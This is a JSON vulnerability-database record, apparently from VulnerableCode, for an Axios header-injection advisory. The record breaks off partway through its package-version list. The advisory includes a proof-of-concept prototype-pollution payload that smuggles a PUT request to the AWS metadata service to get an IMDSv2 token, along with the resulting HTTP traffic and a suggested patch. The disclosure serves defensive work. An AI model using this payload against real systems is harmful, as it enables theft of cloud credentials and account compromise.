{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/351355?format=json","vulnerability_id":"VCID-ek49-tuj4-t3ap","summary":"Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n\n## Summary\nThe Axios library is vulnerable to a specific \"Gadget\" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).\n\nWhile Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.\n\n**Severity**: Critical (CVSS 9.9)\n**Affected Versions**: All versions (v0.x - v1.x)\n**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)\n\n## Usage of \"Helper\" Vulnerabilities\nThis vulnerability is unique because it requires **Zero Direct User Input**.\nIf an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.\n\nBecause Axios does not sanitise these merged header values for CRLF (`\\r\\n`) characters, the polluted property becomes a **Request Smuggling** payload.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\nImagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:\n```javascript\nObject.prototype['x-amz-target'] = \"dummy\\r\\n\\r\\nPUT /latest/api/token HTTP/1.1\\r\\nHost: 169.254.169.254\\r\\nX-aws-ec2-metadata-token-ttl-seconds: 21600\\r\\n\\r\\nGET /ignore\";\n```\n\n### 2. The Gadget Trigger (Safe Code)\nThe application makes a completely safe, hardcoded request:\n```javascript\n// This looks safe to the developer\nawait axios.get('https://analytics.internal/pings'); \n```\n\n### 3. The Execution\nAxios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.\n\n**Resulting HTTP traffic:**\n```http\nGET /pings HTTP/1.1\nHost: analytics.internal\nx-amz-target: dummy\n\nPUT /latest/api/token HTTP/1.1\nHost: 169.254.169.254\nX-aws-ec2-metadata-token-ttl-seconds: 21600\n\nGET /ignore HTTP/1.1\n...\n```\n\n### 4. The Impact (IMDSv2 Bypass)\nThe \"Smuggled\" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).\nThe Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.\n\n## Impact Analysis\n-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).\n-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.\n-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.\n\n## Recommended Fix\nValidate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.\n\n**Patch Suggestion:**\n```javascript\n// In lib/adapters/http.js\nutils.forEach(requestHeaders, function setRequestHeader(val, key) {\n  if (/[\\r\\n]/.test(val)) {\n    throw new Error('Security: Header value contains invalid characters');\n  }\n  // ... proceed to set header\n});\n```\n\n## References\n-   **OWASP**: CRLF Injection (CWE-113)\n\nThis report was generated as part of a security audit of the Axios library.","aliases":[{"alias":"CVE-2026-40175"},{"alias":"GHSA-fvcv-3m26-pcqx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077788?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1"},{"url":"http://public2.vulnerablecode.io/api/packages/1102998?format=json","purl":"pkg:deb/debian/node-axios@1.16.0-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.16.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1067033?format=json","purl":"pkg:npm/axios@0.31.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.31.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631910?format=json","purl":"pkg:npm/axios@1.0.0-alpha.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/1059871?format=json","purl":"pkg:npm/axios@1.15.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0"}],"affected_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994784?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-rqj4-k4np-f7f8"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1"},{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-rqj4-k4np-f7f8"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/994785?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-rqj4-k4np-f7f8"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-rqj4-k4np-f7f8"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/994786?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-rqj4-k4np-f7f8"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-rqj4-k4np-f7f8"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/186153?format=json","purl":"pkg:npm/axios@0.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.1.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186154?format=json","purl":"pkg:npm/axios@0.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186155?format=json","purl":"pkg:npm/axios@0.2.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.2.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186156?format=json","purl":"pkg:npm/axios@0.2.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/186157?format=json","purl":"pkg:npm/axios@0.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.3.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186158?format=json","purl":"pkg:npm/axios@0.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.3.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186159?format=json","purl":"pkg:npm/axios@0.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186160?format=json","purl":"pkg:npm/axios@0.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.4.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186161?format=json","purl":"pkg:npm/axios@0.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.4.2"},{"url":"http://public2.vulnerablecode.io/api/packages/186162?format=json","purl":"pkg:npm/axios@0.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186163?format=json","purl":"pkg:npm/axios@0.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186164?format=json","purl":"pkg:npm/axios@0.5.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.5.2"},{"url":"http://public2.vulnerablecode.io/api/packages/186165?format=json","purl":"pkg:npm/axios@0.5.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.5.3"},{"url":"http://public2.vulnerablecode.io/api/packages/186166?format=json","purl":"pkg:npm/axios@0.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/186167?format=json","purl":"pkg:npm/axios@0.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.6.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186168?format=json","purl":"pkg:npm/axios@0.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.7.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186169?format=json","purl":"pkg:npm/axios@0.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/60985?format=json","purl":"pkg:npm/axios@0.8.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.8.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186170?format=json","purl":"pkg:npm/axios@0.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186171?format=json","purl":"pkg:npm/axios@0.9.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.9.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186172?format=json","purl":"pkg:npm/axios@0.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186173?format=json","purl":"pkg:npm/axios@0.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186174?format=json","purl":"pkg:npm/axios@0.11.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.11.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186175?format=json","purl":"pkg:npm/axios@0.12.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.12.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186176?format=json","purl":"pkg:npm/axios@0.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.13.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186177?format=json","purl":"pkg:npm/axios@0.13